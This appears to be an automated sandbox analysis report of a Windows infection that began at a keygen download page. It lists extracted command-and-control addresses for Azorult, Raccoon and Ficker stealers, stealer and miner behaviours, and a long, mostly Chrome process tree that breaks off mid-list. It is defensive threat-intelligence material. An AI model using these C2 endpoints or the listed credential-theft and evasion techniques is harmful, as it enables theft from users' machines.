Analysis

  • max time kernel
    1800s
  • max time network
    1802s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    23-04-2021 19:22

General

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1884
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/9472d2406f110qn26n09.html
        1⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:784
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffe0b864f50,0x7ffe0b864f60,0x7ffe0b864f70
          2⤵
            PID:520
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1600 /prefetch:2
            2⤵
              PID:3532
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1788 /prefetch:8
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:3868
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2176 /prefetch:8
              2⤵
                PID:3600
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1
                2⤵
                  PID:2136
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
                  2⤵
                    PID:924
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                    2⤵
                      PID:3984
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                      2⤵
                        PID:2348
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1
                        2⤵
                          PID:2608
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
                          2⤵
                            PID:4120
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4832 /prefetch:8
                            2⤵
                              PID:4356
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4584
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
                              2⤵
                                PID:4816
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6272 /prefetch:8
                                2⤵
                                  PID:4872
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
                                  2⤵
                                    PID:4892
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6280 /prefetch:8
                                    2⤵
                                      PID:4952
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
                                      2⤵
                                        PID:4964
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6364 /prefetch:8
                                        2⤵
                                          PID:5024
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
                                          2⤵
                                            PID:5060
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
                                            2⤵
                                              PID:5084
                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                              2⤵
                                                PID:5108
                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x21c,0x248,0x7ff6507aa890,0x7ff6507aa8a0,0x7ff6507aa8b0
                                                  3⤵
                                                    PID:4328
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:8
                                                  2⤵
                                                    PID:4200
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4424
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5988 /prefetch:8
                                                    2⤵
                                                      PID:4400
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5812 /prefetch:8
                                                      2⤵
                                                        PID:4556
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5840 /prefetch:8
                                                        2⤵
                                                          PID:4592
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:8
                                                          2⤵
                                                            PID:4580
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5748 /prefetch:8
                                                            2⤵
                                                              PID:4588
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5844 /prefetch:8
                                                              2⤵
                                                                PID:4740
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:8
                                                                2⤵
                                                                  PID:4736
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
                                                                  2⤵
                                                                    PID:4848
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7008 /prefetch:8
                                                                    2⤵
                                                                      PID:4916
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7032 /prefetch:8
                                                                      2⤵
                                                                        PID:4884
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7136 /prefetch:8
                                                                        2⤵
                                                                          PID:4924
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7148 /prefetch:8
                                                                          2⤵
                                                                            PID:4908
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7160 /prefetch:8
                                                                            2⤵
                                                                              PID:4992
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6984 /prefetch:8
                                                                              2⤵
                                                                                PID:5048
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:8
                                                                                2⤵
                                                                                  PID:3188
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:8
                                                                                  2⤵
                                                                                    PID:4952
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
                                                                                    2⤵
                                                                                      PID:1584
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2320
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8044 /prefetch:8
                                                                                        2⤵
                                                                                          PID:3832
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8160 /prefetch:8
                                                                                          2⤵
                                                                                            PID:4576
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7048 /prefetch:8
                                                                                            2⤵
                                                                                              PID:4940
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8416 /prefetch:8
                                                                                              2⤵
                                                                                                PID:4900
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8548 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:3080
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8560 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:5088
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8584 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:5112
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8596 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:5104
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8572 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:5056
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8580 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:5156
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4176 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:5220
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:5268
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8252 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:5328
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8040 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:5392
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8684 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5556
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 /prefetch:8
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:5600
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4752 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:5736
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8668 /prefetch:8
                                                                                                                    2⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5776
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8684 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:5892
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,13359363563399294076,6374901686931675355,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1640 /prefetch:2
                                                                                                                      2⤵
                                                                                                                        PID:6788
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
